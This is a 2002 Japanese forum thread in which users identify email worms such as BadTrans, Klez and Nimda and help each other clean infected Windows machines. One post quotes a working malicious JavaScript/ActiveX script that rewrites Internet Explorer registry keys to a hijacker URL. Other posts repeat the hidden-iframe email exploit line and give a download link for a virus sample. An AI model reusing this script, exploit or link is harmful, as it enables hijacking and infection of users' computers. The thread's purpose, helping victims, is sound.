という流れです。ここでは、HTMLメール内に埋めこむのは Java Script でも
ActiveX でも Visual Basic Script でもなんでもありです。要は、HTML に
記述、実行出来るものならなんでも OK です。
0795名無しさん@お腹いっぱい。
NGNGやや記憶が曖昧ながらNimda。
だとすると去年の9月後半くらいか。
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html
外した、中盤だ。MIMEコードのファイル誤認識を利用して、
exeファイルを自動実行。Windowsメディアプレーヤーが起動した。
0796名無しさん@お腹いっぱい。
NGNGhttp://www.symantec.com/region/jp/sarcj/data/v/vbs.bubbleboy.html
最初はVBS.BubbleBoyが見ただけで感染するウイルス。
しかし、日本語環境では感染できなかった。
余談かもしれんが一応。
0797cheshire-cat
NGNGMS99-032とMS01-020。
一番最初のは、796の人のレスのバブルボーイ。
これは日本語版のOSだと、インストール先のフォルダが無かったらしい。
でもOEのセキュリティをめちゃくちゃ固めると、起動できない。
ダイレクトアクション系は、BubbleBoy、Aliz, Badtrans, Klez, Nimda, Toalなど。
0798名無しさん@お腹いっぱい。
NGNG<iframe src=3Dcid:SOMECID height=3D0 width=3D0>
ってやつはAlizもBadtransも同じだね
0799名無しさん@お腹いっぱい。
NGNGに感染したんですけど、どうやったら駆除できますか?
0800名無しさん@お腹いっぱい。
NGNGさっさとアンチウィルスソフトを買ってこい。
0801名無しさん@お腹いっぱい。
NGNGひろゆきが被害者であるにも関わらず、ひろゆきに対し、随分と横柄な
態度をしたらしい。
よって2ちゃんねらーの力で赤羽警察に制裁を加えなくてはならない。
赤羽警察の不祥事等情報求む!
http://mentai.2ch.net/test/read.cgi/police/1014406027/
0802+anonymous
NGNG実はJS_EXCEPTION.GENの"駆除"はできない。
ていうか手動でFileを削除して書き換えられた設定を元にもどせばOK。
インターネットオプションから設定を書き直しても元に戻るようなシツコイ場合は、
MS-DOSモードで起動→"scanreg /restore"でレジストリまるまる復元。
参考
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN
0803名無しさん@お腹いっぱい。
NGNGページが表示されません・・・
0804名無しさん@お腹いっぱい。
NGNG0805名無しさん@お腹いっぱい。
NGNGシマンテックの奴ら、家で寝てるのか?
サイトには何の記述も無し。
ふざけるな!!!!
0806Norton AntiVirusに、複数の脆弱性が発見された。
NGNGhttp://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html
Content-Type: application/msword;
name=\"Virus.nch\"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=\"Virus.exe\"
0807名無しさん@お腹いっぱい。
NGNGここGoogleのキャッシュで見ちゃったんだけど大丈夫?
0808名無しさん@お腹いっぱい。
NGNG2002限定なのかな?
0809名無しさん@お腹いっぱい。
NGNGできるヤツは、そもそも日本には居ねぇーんだよ
http://easyweb.easynet.co.uk/~hiros/Virus.htm
アンチウィルスソフトで発見不能ウィルス(全てのアンチウィルスで発見できないわけではありません)
の
「cb4111」 も似たようなもの?
0811cheshire-cat
NGNGNortonの除外リストから、dbxとnchのエクステンションはずせばいいだけのような気が。
Mail保護から漏れても、常駐スキャンでプロセス停止されないのかな。
>>810
以前調べたら、マクロをExcel→Wordだかその逆方向で貼り付けていたので、コードが含まれているにも関わらず検出されないだけだった。
0812cheshire-cat
NGNGちょっと楽しみ。
0813cheshire-cat
NGNGOutlook Expressを使っていなければ、除外しなくても不具合が起きなかった。
http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/543a1624cf3230b349256a5d004a46e1/b877a752580252a449256aff005d2c63?OpenDocument
http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/543a1624cf3230b349256a5d004a46e1/7a1bb8160ac42cb649256aff005cf154?OpenDocument
http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/7a63e7e7d6a83a5f49256a5d004a46e0/d1e544250123822949256aee00027bad?OpenDocument
0814名無しさん@お腹いっぱい。
NGNGMSNメッセンジャーが使えなくなるやつです。
ノートンアンチウイルス入ってるのに何故かかってしまったんでしょう?
0815名無しさん@お腹いっぱい。
NGNG人生そんなもん
0816名無しさん@お腹いっぱい。
NGNGこれってウイルスですか?
まだ恐くて開いていませんが、教えてください。
0817名無しさん@お腹いっぱい。
NGNGとりあえず外しました。
でも何で除外になってたんでしょうね?
0818名無しさん@お腹いっぱい。
NGNG>>813 のリンク先にモロに書いていた。
漏れはOutlookExpress使ってないから除外してOKみたいです。
0819(・з;)
NGNG"Ramli Bin Ab. Aziz" <_krr6222@tm.net.my>
件名 : Re:
日付 : Fri, 15 Mar 2002 23:44:28 +0800 (SGT)
添付ファイル : Me_nude.MP3.scr (38k), TEXT5.txt (0b)
これってウィルスだよね?
0820cheshire-cat
NGNG酔っ払いに絡まれて機嫌悪いんだけど。
漏れのリストには載ってない送信者名。
でも二重拡張子でscr(これってスクリーンセーバー=安心じゃなくて、実行ファイル)だから、おそらくVilli。
0821名無しさん@お腹いっぱい。
NGNGそれ典型的なBADTRANS_B
0822名無しさん@お腹いっぱい。
NGNGまず間違いなく Virus。
即効でゴミ箱にどうぞ。
0823cheshire-cat
NGNG送信者もメアドも、チェック漏れだった、と思ってたら。
「メールアドレスの先頭に"_" という文字を付加」、という奴か。
0824名無しさん@お腹いっぱい。
NGNG0825名無しさん@お腹いっぱい。
NGNG差出人が実行ファイル送ってきたのだからウィルスで当然だと思う
心がけが必要。
0827名無しさん@お腹いっぱい。
NGNGなんか殺伐とした社会生活を送ってないかキミ。
0828名無しさん@お腹いっぱい。
NGNG法学部で撮ったたぬきの写真。
http://mbspro5.uic.to/user/mikkixi.html
↑はウイルスなんでしょうか?
パソコン初心者なんでよくわかりません。
入ってしまいました。そしたら、いきなりウイルスのインストールを完了しましたって言われた。
まだ、何もおきません。
0829名無しさん@お腹いっぱい。
NGNGhttp://ex.2ch.net/test/read.cgi/entrance/1016211794/
で聞きましょう。
0830心当たりのある差出人にも注意!!!!!!!!!!!!!!!!!!!
NGNGアドレス帳にアドレスがある可能性がある。
らるー送ってくるアフォもいる。
−−−−−−
ウイルスのチェックは最低限必要。
−−−−−−
インターネット=ソープランドのマンコ
パソコン=チンコ
これでもナマでヤリますか?
淋、蔵まみれになりますか?
0831名無しさん@お腹いっぱい。
NGNGつーかちょっと待てやおまえさん。
せめて差出人のメアドは伏せてからカキコしなさいや。
0832名無しさん@お腹いっぱい。
NGNG作成するウィルスらしきメールが送信されてきています。
どなたかウィルス名に心当たりある方はいらっしゃいませんでしょうか?
例えばこのページなら、
To:krr6222@tm.net.my(819参照)
Subject:Symantec(1参照)
添付ファイル:Symantec.exe(またはbat)
また何故かその時閲覧したキャッシュファイルも送ってくるようです。
例:l50[1].html
メールの送信者はどうも、アドレス帳からランダムに選んでいる臭いです。
Recieved fromのサーバとは別のアドレスになっていました。
IPA ISECのデータベースでは分かりませんでした。
情報少ないと思いますが、ご存知でしたら教えて下さい。
0833832
NGNG本文は以下のようになっていました。
<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:H8MUE77q083 height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>
また添付ファイルのContent-typeは
Content-Type: audio/x-midi
です。
0835832
NGNG情報どうもありがとうございます。
ただ、頂いた情報を元にIPA,MacAfee,Symantecで検索したのですが、
一致する情報を得られませんでした・・・。
他のウィルスでは無いでしょうか。
(勘違いでしたら申し訳ありません)
0836名無しさん@お腹いっぱい。
NGNGhttp://itpro.nikkeibp.co.jp/NOS/reference/BUGTRAQ-JP-20010409091825-B7A1.txt
この辺が近いかもしれないと思いますが。
0837832
NGNGどうもありがとうございます。対策情報ですね?
取り敢えずブラウザ等は最新版(&パッチ)はあてていますが・・・
IEとOE使っていると、いつ感染するか分からないので冷や冷やですね。
ちなみに、また同じ人アドレスからウィルス来ていました。
今度はどうも種類の違うウィルス・・・かもしれませんが。
閲覧したキャッシュファイルを同時に送ると言う特徴は同じです。
こっちもIPAでは検索できませんでした(検索下手?)
Subject:A special new game
本文:
<HTML><HEAD></HEAD><BODY>
<FONT>This is a special new game<br>
This game is my first work.<br>
You're the first player.<br>
I expect you would like it.</FONT>
<br><br>
-----------------------------------------------------<br>
Kredyt przez internet - <a =
href=3Dhttp://www.finanse.hoga.pl>;www.finanse.hoga.pl</a><br>
</body></html>
添付ファイル:setup.exe
0838名無しさん@お腹いっぱい。
NGNGと言いますか、ウィルスだっていう所まで分かってて、これ以上
何が知りたいんでしょうか?
0839832
NGNG具体的な対策を書いてあるサイトなりを知って、
自分のサイトに掲載して他の人に警告と対処方法を教えておきたいんです。
でないと、自分のメールの大半がウィルス状態になりますから・・・(涙)。
0840名無しさん@お腹いっぱい。
NGNG誰もお前みたいな無知に教えてほしくないだろ プ
0842名無しさん@お腹いっぱい。
NGNG夜中にならないと詳しい人来ないから、暫くしたらまた来るよろし。
0843名無しさん@お腹いっぱい。
NGNGPCを立ち上げると、WININITが開くようになりました。
検索で調べるとウイルスの可能性が高いようなのですが、WININIT.INIファイルは
見つかりませんし、ノートンのアンチウイルスでスキャンしても何も引っかかり
ません。
どうしたらWININITが立ち上がらないようにできるのでしょうか。
ご存知の方がいらっしゃれば、教えていただけませんか?
0844名無しさん@お腹いっぱい。
NGNGI LOVE YOU にやられてから
パソコンの前に塩盛ってるよ
0845名無しさん@お腹いっぱい。
NGNGスタートメニューから「ファイル名を指定して実行」で msconfig やってみて。
そこの「スタートアップ」見てみて。
それでわからなかったらもう一回質問して。
0848名無しさん@お腹いっぱい。
NGNG0849名無しさん@お腹いっぱい。
NGNG差出人:RIKO <_riko51-k3@h3.dion.ne.jp>
日時:2001年11月30日 0:55
件名:Re:
添付:ATT00026.txt(178バイト) ATT00029.txt(137バイト)
ATT00032.txt(0バイト)
------------------ Virus Warning Message (on mail)
Found virus WORM_BADTRANS.B in file Me_nude.MP3.scr
The file Me_nude.MP3.scr is moved to /etc/iscan/virus/virABA0o0mHk.
---------------------------------------------------------
ウイルスは間違いないのですがこのウイルスはどういった症状が起こるのか
教えてください。今のところ特に大きな異変はないです。
0850名無しさん@お腹いっぱい。
NGNGあります。これについてご存知の方、教えていただけないでしょうか?
検索をかけたのですが、違うものにヒットしてしまってよく分らなかったもので……。
0851名無しさん@お腹いっぱい。
NGNGftp://ftp.europe.f-secure.com/anti-virus/tools/kleztool.zip
0852名無しさん@お腹いっぱい。
NGNG--Virus Warning Message 以降の行を読むと、感染する前に隔離
されたっぽいので、症状が起きなくて当然。
そのメールをゴミ箱に放り込めばすべて完了。
0853名無しさん@お腹いっぱい。
NGNG情報が少なすぎて調べようがないです・・・。
添付ファイルがあったら添付ファイルの名前を、本文に何か書いてあれば
その内容を教えてください。
0854名無しさん@お腹いっぱい。
NGNGそうですか。でも最近小さな異変があるのですがこれはウイルスと関係あるのですか?
症状は↓です。
次のページに進んだり、新しいウインドウで開く時、Internet Explorer の
オン デマンド インストールというのが出てきます。文字を正しく表示するのに
ダウンロードが必要です。という奴です。キャンセルを押しても全然消えなくて、
仕方なくダウンロードをするを押しても、失敗しました。もう一度やり直してください。の繰り返し。
ウインドウを閉じようとするとこれを閉じると問題が発生します。のようなことがでてきます。
結局これは本体の電源を切るまで消えません。
0855cheshire-cat
NGNGIEのプロパティ→セキュリティ→フォントのダウンロードを無効にしれ。
0856名無しさん@お腹いっぱい。
NGNGhttp://www.symantec.com/region/jp/sarcj/data/w/w32.badtrans.b@mm.html
まさかsp2にしてないって話じゃないよね?
あと、差出人のアドレスが出ちゃってます。
0857854
NGNG>>856のサイトにいけば何かわかるのですか?
0858名無しさん@お腹いっぱい。
NGNGどう考えてもウィルスの症状ではない。
ページを表示するのに必要なフォントが無いから(IEが)どこかからダウンロード
しようとしたんだけど失敗した、という風にみえる。
じゃあ何で失敗するのかと聞かれても困るが・・・
0859cheshire-cat
NGNGあのー、何だか無視されてるんだけど。
858の人が書いた通りだと。
Windows Updateからフォントを一通り落とせばいいんじゃ?
0860854
NGNGわかりました。やってみます。
0861名無しさん@お腹いっぱい。
NGNGありがとうございます
0862非常に珍しいことですが裁判官の個人のHPがあります。
NGNG0863名無しさん@お腹いっぱい。
NGNGめちゃくちゃ困っています。
まぁ海外のエロサイトからexploitというのを送り込まれてます。
0864名無しさん@お腹いっぱい。
NGNGそれで、質問の内容は何ですか?
0865cheshire-cat
NGNGエクセプション系をWebTrapでブロックしたって話のような。
0866名無しさん@お腹いっぱい。
NGNG>具体的な対策を書いてあるサイトなりを知って、
>自分のサイトに掲載して他の人に警告と対処方法を教えておきたいんです。
>でないと、自分のメールの大半がウィルス状態になりますから・・・(涙)。
>>842 :名無しさん@お腹いっぱい。 :02/03/17 18:56
>夜中にならないと詳しい人来ないから、暫くしたらまた来るよろし。
あまり詳しくはないが ^^)、いちおー夜中になったので、マジレスしよう。
アンチウィルスソフトウェア(とくにウイルスバスター)を入れて、
最新で適切な状態(現状エンジンでの LAN を除く)にしていないであろう
のに、ウィルスなのか確認できていないものをウィルスと決めつけて、
「他の人に警告と対処方法を教えて」やるなどすることは、混乱を助長する
だけだ。 (本末転倒という言葉もある)
ってことだ。
0867(・з;)819
NGNGやっぱウィルスですよね。
>>820-826どうもありがとう。
0868832
NGNGアンチウィルスソフトはAVGを入れています。
個人的にウィルス対策はウィルス対策ソフトに頼るだけでなく、
自信の警戒心も必要だと思っておりメールを開いていない為、
対策ソフトによる判別は出来ていません。
"混乱を助長する"可能性は確かにあると思います。
寧ろそのように思ったからこそ、ここで教えて頂いてから通達しようと思い、
質問させて頂きました。
勿論、ここで明確に出来なければ警告は出しません。
0869Mac+Netscape使っていてよかった
NGNGCOPYRIGHT ENDというサブジェクトで来るやつがあるから気をつけて。
添付ファイルなしのやつ。
0870名無しさん@お腹いっぱい、
NGNGブロックしたらしいので一安心。
javascriptの不正プログラムがどうとか言ってるけど、
アクティブXでもできそうな気が…
むしろこっちの方が恐い…
勝手に掲示板にスクリプトを書きこむなんてなったら恐いな。
まぁ、2ちゃんねるは安全だろうけど…
そう言えば以前、ニムダをファイアウォールがブロックしてたな…
メール以外からも来るなんて驚きだ…
0871名無しさん@お腹いっぱい。
NGNG0872名無しさん@お腹いっぱい。
NGNG0873名無しさん@お腹いっぱい。
NGNGノーd先生の時は出来たんですけど…。
何か設定しなければいけないのでしょうか?
当方XP Home
McAfee v4.5.1 SP1です。
0874名無しさん@お腹いっぱい。
NGNG付け始めたし。
JENS SpinNetでとうとう標準装備になったけどこれはどうなんでしょ??
http://www.watch.impress.co.jp/broadband/news/2002/03/18/jens.htm
うちのISPもただにならないかな。。。
0875JENSに乗り換え検討中
NGNG0876名無しさん@お腹いっぱい。
NGNGそしたらPE_CIHとかいう危険度が高いらしいウィルスが発見されました。
ほとんどの感染ファイルはウィルス駆除ができたのですが、c:\windows\system\mstask.exeというファイルとc:\windows\system\MPREXE.EXEというファイルだけ駆除ができませんでした。
手動で削除しようとしてもWindowsが使用しています、削除できませんと出てきます。
この場合の対処法を教えていただけませんでしょうか?
何回もウィルスバスター2002で駆除しようとしてもその2つのファイルだけは駄目でした。
毎月26日にハードディスクをズタズタにするそうなので早めに教えてください、本当にお願いします。
マシンOSはWindowsMeです。
どうか教えてください、よろしくお願いします。
0878cheshire-cat
NGNG駆除ツール使え。
なんのツールを使えばいいんですか?
0880cheshire-cat
NGNGトレンドマイクロって今、ほとんど落ちているような状態で接続できないので。
Symantecで検索
http://www.symantec.com/region/jp/sarcj/vinfodb.html
そこから見つかる、SymantecのCIH情報
http://www.symantec.com/region/jp/sarcj/data/w/w95.cih.html
上記に記載されている、Symantecの駆除ツール。
http://www.symantec.com/region/jp/sarcj/kill_cih.html
えっとね。
多分もう、実行ファイルの幾つかは腐ってるから。完全回復しうるかどうか、漏れは保証しないよ。
どうしてもトレンドの情報の方がいいって言うなら。こちらをどうぞ。繋がらないけど。
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=PE%5FCIH
0881名無しさん@お腹いっぱい。
NGNG漏れ昔からJENSだから良かっただよ
AT&Tじゃなくなったから乗り換えようかと思ったけどやめとこう
0882cheshire-cat
NGNG0883832
NGNG長引かせても申し訳無いので、諦めます。
ご協力下さったみなさん、ありがとうございました。
また自力で何か分かりましたら、ここに書きます。
0884cheshire-cat
NGNG漏れのリストには、そういうの載ってない。
けどそれって、既存のVilli改造すれば、容易のような。
でも頂戴。というか、下さい。
0886
NGNGそれで何気なしにインストールしてから尻無ということに気づいて
削除しました。それから
再起動するたびにEASY CD CREATERのアプグレードを奨めます。
3〜4回目くらいにうんざりしてアプグレしてみようとRoxioに逝きました。
それでアプグレの箇所をクリックしたらいきなり
Operating system not found の画面になったので、
BIOSモードで起動して標準設定値にしましたが直らず、
セーフモードでも起動できません。
どうしたらいいのです?
0887名無しさん@お腹いっぱい。
NGNGfdisk /mbr
0888886
NGNG漏れはXPにアップグレードしてますが fdisk /mbr
の起動は可能でしょうか?
すいません教えてください
0889名無しさん@お腹いっぱい。
NGNG2002年2月の尻集に載ってるのに…
0890☆最新話題☆
NGNG0891名無しさん@お腹いっぱい。
NGNGXPならCDから起動して修復モードコンソールをだせば、
fixboot / fixmbr ってのが使えます
プロンプトでhelpいれると一覧でてくるよ
0893名無しさん@お腹いっぱい。
NGNGhttp://slashdot.jp/article.pl?sid=02/03/18/2211214&mode=thread
http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html
0894名無しさん@お腹いっぱい。
NGNGこんなもの拾ってきました。
TROJ_IMISERV.B
HP見ただけで貰うの初めてです
0895832
NGNGAVGの最新版では感知は出来ないようですのでご注意下さい。
他のウィルス対策ソフトでは感知できるそうです。
それでは、失礼致します。
0896名無しさん@ぼやき
NGNG最初はいちいち「感染してますよ」と知らせていたんだけど、
いい加減面倒くさくなってしまった・・。
本日をもって放っておく事に決定。ちょっとスッキリ。
0897名無しさん@お腹いっぱい。
NGNG0898Win32.Mimee
NGNGの
Win32.Mimee
http://www.ebcvg.com/sections/binary/Win32.Mimee.zip
−−−−−
short description :
w32.mimee is written in visual basic 6 and targets .eml files... when executed, it spawns
mime.exe in c:\, searches for .eml in harddrive and infects them by adding itself as an
attachment.. .eml files which are saved in rich text (html), whether or not they contain
attachments, will be successfully infected by w32.mimee... .eml files that are saved in plain
text and are having one or many attachments will also be infected by the virus... .eml files
that are saved in plain text and are containing no attachments won't be successfully infected...
win32.mimee inserts a signature in files that it infects so they won't be reinfected..
no registry modifications are made by the virus...
written just to personally discover the possibility of infecting .eml files...
alcopaul
03/07/2002
−−−−−
Symantec Security Response Automation システムは提出されたファイルを分
析しましたが、悪意があるコードを見つけませんでした。
もし我々に提出したファイルで感染した疑いがあるならば、テクニカルサポー
トにご連絡してください。
0900名無しさん@お腹いっぱい。
NGNG「Have a funny Lady Day 」もしくは
「Happy Lady Day」というタイトルで送られてくるメールが
多数あるのですがこれはウイルスなのでしょうか?
Symantec等でウイルス情報の検索をかけたのですが何も出てきませんし。
ちなみにファイルサイズは大体、120kb前後です。
0901名無しさん@お腹いっぱい。
NGNG「write Fixup」「Hello,Your Password」というのがきています。
サイズは同じく120k前後、1つだけテキスト表示で見てみましたが
中身は無く添付ファイルがhtmlとpif。
0903cheshire-cat
NGNG今ごろレスが来た。
半分くらいはまあ、変なファイルにバインドして失敗した壊れた奴とか、解凍したら実行ファイルじゃなかったとか(ろくに確かめもせず送って、反省中)、って回答だった。
残りはさ、「最新の定義ファイルで検出できます」、だって。複雑な気持ち。
某社の定義ファイルの更新が先日重かったのは、漏れのせいです。
0904900
NGNGどうもです。
ノートンは入れてあったので大丈夫だとは思いましたが、
定義ファイルを最新にしてチェックしてみたところ問題ありませんでした。
にしても感染している人が多そうですね。
0905cheshire-cat
NGNGKLEZ.Eの感染者がやたらと多いのは、複数の変種がまとめて同じ検出名だという現実を反映しているためかと。
早くなんとかしてほしい。
0906名無しさん@お腹いっぱい。
NGNG832のVirを欲しがったのは単にコレクションしたいだけなのかと思ってたら
ちゃんと調べたのね。お勤めご苦労様。
0907900
NGNG変種が色々とあるんですね。
サイズやサブジェクトが異なるのはそのせいでしょうか。
にしても1日に4通は多いなぁ。
0908cheshire-cat
NGNG本人にはメル送りました。
現在漏れが所有している3タイプのうちの一つでした。
「件名や送信者名が多様だから」、って思い込みのためなんでしょうか。
漏れVilliはVBSしか理解できない厨だから、人に何か教えるほどのスキル無いけど。
配布(と言っていいのか?)は、メル経由と他のファイルにバインドしてMX、この2つが主流。シルクロープでも使えば簡単だろうし。
なおKLEZ系は、NortonとTrendとAitidoteとMcAFEEは同様の情報だけど。
何か情報が交錯してるっしょ?
ちなみにSophosは、あと2つほど検出名多いです。
0909cheshire-cat
NGNGHP立てると、イパーイ来るよ。
ちなみに漏れが今Virri情報集めまくってるのは、うちの鯖が喰らってあぼーんされた腹いせのようなものです。
0910名無しさん@お腹いっぱい。
NGNGVBS読めるならOffice のマクロ系も読めるよ(メリッサとか)。
0911832
NGNG直接的な物ではありませんが、困ったウィルスですね。
http://www.bestrsv.com/info/virus-rep010.html
0912cheshire-cat
NGNGVBSと似たようなものだからね。
ちなみにマクロ系流行る以前は、ほとんどウイルスに無関心だったよ、一太郎中心だったし。
罫線が楽だったな、一太郎。Wordはその点は使いづらくて。
0913名無しさん@お腹いっぱい。
NGNGそのページ読んで疑問なのが
>全てに渡りパソコンを使用せず、UNIX上でのプログラム作成を行って
>おりますのでファイル(ウ イルス等)が添付される事はございませんの
>でご安心ください。
の部分なんだよな。UNIXにはウィルスが無いとでも思ってるのかしら。
0914cheshire-cat
NGNGどうも。
送信者が知人だったりしたら、人間関係悪くなりそうですな。
0915名無しさん@お腹いっぱい。
NGNGKlez はこれを詐称して無関係の他人を巻き込む。あまり知られていないので要注意。
社内をアンチウィルスソフトでガチガチに固めても、知りもしない第三者によって
会社の信用が落とされてしまうという悲劇が実際にいくつも起きている。
http://a500.g.akamai.net/7/1776/484/00003/inet.trendmicro.co.jp/solutionfile/3638KLEZ_E.html
>・E-Mail送信の際の差出人:
> 「WORM_KLEZ.E」では、感染コンピュータ内で取得した任意のメールアドレス、
>または以下のアドレスのいずれかを使用します。
> メール送信の際に使用する SMTP サーバは、メールの「差出人」に設定された
>メールアドレスのドメインを使用する場合があります。差出人のメールアドレスを
>「any_user@somewhere.com」として設定した場合、SMTP サーバ「smtp.somewhere.com」
>を利用します。
POP before SMTPや接続元IPアドレスでの制限をせず、Fromアドレスだけ一致していれば
送信を許可してしまうような甘い設定のメールサーバはKlezの踏台になる可能性がある。
0916名無しさん@お腹いっぱい。
NGNGの
Win32.Mimee
http://www.ebcvg.com/sections/binary/Win32.Mimee.zip
−−−−−
short description :
w32.mimee is written in visual basic 6 and targets .eml files... when executed, it spawns
mime.exe in c:\, searches for .eml in harddrive and infects them by adding itself as an
attachment.. .eml files which are saved in rich text (html), whether or not they contain
attachments, will be successfully infected by w32.mimee... .eml files that are saved in plain
text and are having one or many attachments will also be infected by the virus... .eml files
that are saved in plain text and are containing no attachments won't be successfully infected...
win32.mimee inserts a signature in files that it infects so they won't be reinfected..
no registry modifications are made by the virus...
written just to personally discover the possibility of infecting .eml files...
alcopaul
03/07/2002
−−−−−
Symantec Security Response Automation システムは提出されたファイルを分
析しましたが、悪意があるコードを見つけませんでした。
もし我々に提出したファイルで感染した疑いがあるならば、テクニカルサポー
トにご連絡してください。
0917名無しさん@お腹いっぱい。
NGNG0918名無しさん@お腹いっぱい。
NGNGFROM: なし
BODY: なし
ATTACHMENT: BOBNBFBO.EXE
3月11日着
二フ経由
グルグルしてもシマンテック・トレンドマイクロ
検索したけど引っかからない〜
(あんちびる 入れてないオイラも悪いけど…)
実行したくてしたくてうずうずする〜
0919名無しさん@お腹いっぱい。
NGNG0920名無しさん@お腹いっぱい。
NGNG0921名無しさん@お腹いっぱい。
NGNG0922ドキンちゃん
NGNGhttp://www.ipa.go.jp/security/topics/hybris.html
0923名無しさん@お腹いっぱい。
NGNGものすごくわかりやすいファイル名(w
0924ナマでパコパコ!!!!
NGNGナマでパコパコ!!!!
インターネット=ソープランドのマンコ
パソコン=チンコ
これでもナマでヤリますか?
淋、蔵まみれになりますか?
0925うーん・・・
NGNGアドレス帳が消えてしまったと…
復活の方法ってあるんでしょうか?
0926テイル
NGNGを実行してしまったんですけど直す方法はないでしょうか?;;
0928名無しさん@お腹いっぱい。
NGNGページのHTMLソースを読んで、この逆をやればイイ。
0929テイル
NGNG0930名無しさん@お腹いっぱい。
NGNG一個のスクリプトのため「駆除」できません。検知した場合は、ファイルを「削除」してください。
「ウイルス発見時の処理」の設定が「ウイルス駆除」になっている場合、「駆除失敗」となることがあります。その際は、検知したファイルを「削除」していただければ、問題ありません。
スクリプトが実行された場合、Internet Explorer のスタートページなどが変更されているおそれがあります。その場合は、[ツール]−[インターネットオプション]から、設定を変更してください。
また Microsoft 社提供の最新 Internet Explorer 修正モジュールを適用するようにしてください。
0932名無しさん@お腹いっぱい。
NGNG0933名無しさん@お腹いっぱい
NGNGhttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN
さすがに無断引用とは言わないだろうけど。
コピペするんだったらリンク貼って「〜より引用」くらい書き添えましょ。>>930
ネチケッツだと思われ。
>>926
<!--IPT language=JavaScript <!--
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent
</APPLET ");function yuzi(){try{a1=document.applets[0];a1.setCLSID
("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl =
a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");try{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://go5.163.com/sg9741/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "http://go5.163.com/sg9741/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " ィt。トr
http://go5.163.com/sg9741/ィq。トsQQセ翅ヨイソ シクヘクQQヲコナテ箙ムヒヘ~!!」。");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " ィt。トr
http://go5.163.com/sg9741/ィq。トsQQセ翅ヨイソ QQヲコナテ箙ムヒヘ,シクヘクナカ.ヌ・シメセ。ソ・スアセユセ~!!」。");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","
http://go5.163.com/sg9741/");}catch(e){}}catch(e){}}setTimeout("yuzi()",1000);
// -- </SCRI-->
で、>>926に自分でやれと??
言葉数の少ない人ですな。…ま、それもいいだろうけど。
ていうかソース見てもわかんなかったから、質問してきたんだと思うけどなぁ。
>>926
ファイル名指定→"msconfig"→win.iniタブ以下の、windowsの"run= "の右側を削除して空欄に。
ついでだから"load= "も見れ。(通常、= の右側は空欄)
それから、インターネットオプションのホームページを元どおりに書き直す。
仕上げにTemporary Internet File削除→再起動
0936そろそろ・・・
NGNG\∧_ヘ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!! ,,、,、,,,
/三√ ゚Д゚) / \____________ ,,、,、,,,
/三/| ゚U゚|\ ,,、,、,,, ,,、,、,,,
,,、,、,,, U (:::::::::::) ,,、,、,,, \オーーーーーーーッ!!/
//三/|三|\ ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
∪ ∪ ( ) ( ) ( ) )
,,、,、,,, ,,、,、,,, ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
,,、,、,,, ( ) ( ) ( ) ( )
実際、踏んでないからワカんない。
でも最新パッチ充てて、ActiveXとJAVA切って、javaスクも切ってたら大概防げるんじゃない?
ていうか逆にこっちが訊きたいくらい。
自分には人柱になる度胸なんてないし。
そう言えば、セキュ板には喜んで人柱になる有名な人がいるな(w
誰とは言わないけど。
0940cheshire-cat
NGNGJAVA VMが3802以上なら大丈夫、と言われてるよ。
0941938
NGNGhttp://www.zdnet.co.jp/download/pc/tools/msjavavm_u.html
って訊こうとおもったらレスが…
>>940
>JAVA VMが3802以上なら大丈夫
と、言われても自分はちょっと→(((((;゚Д゚)))))ガクガクブルブルな状態です。
なもんでやっぱ遠慮しときます。切っててもとくに困んないし…
情報サンクス子>>cheshire-cat
0942cheshire-cat
NGNGでもエクセプション系だけじゃないし、危険なのは。
938の人の書いた通りに、日頃から設定はきつめにした方がいいかと。
クスコってどこで売ってるんだ?
0943名無しさん@お腹いっぱい。
NGNG975 迄に立つ気配無かったらチェシャ猫さんにお願いという事で。
0944そろそろ・・・
NGNG\∧_ヘ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!! ,,、,、,,,
/三√ ゚Д゚) / \____________ ,,、,、,,,
/三/| ゚U゚|\ ,,、,、,,, ,,、,、,,,
,,、,、,,, U (:::::::::::) ,,、,、,,, \オーーーーーーーッ!!/
//三/|三|\ ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
∪ ∪ ( ) ( ) ( ) )
,,、,、,,, ,,、,、,,, ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
,,、,、,,, ( ) ( ) ( ) ( )
0945cheshire-cat
NGNG推薦してもらってありがたいんだけど。
漏れスレッド立てられないんだよね、何故だろ。
09461 ◆tHfDbgsU
NGNG0947名無しさん@お腹いっぱい。
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1016863569/l50
新スレ立ちました
(立った直後にPCがフリーズしたときは「氏ねMS!」と本気で思いました)
0949cheshire-cat
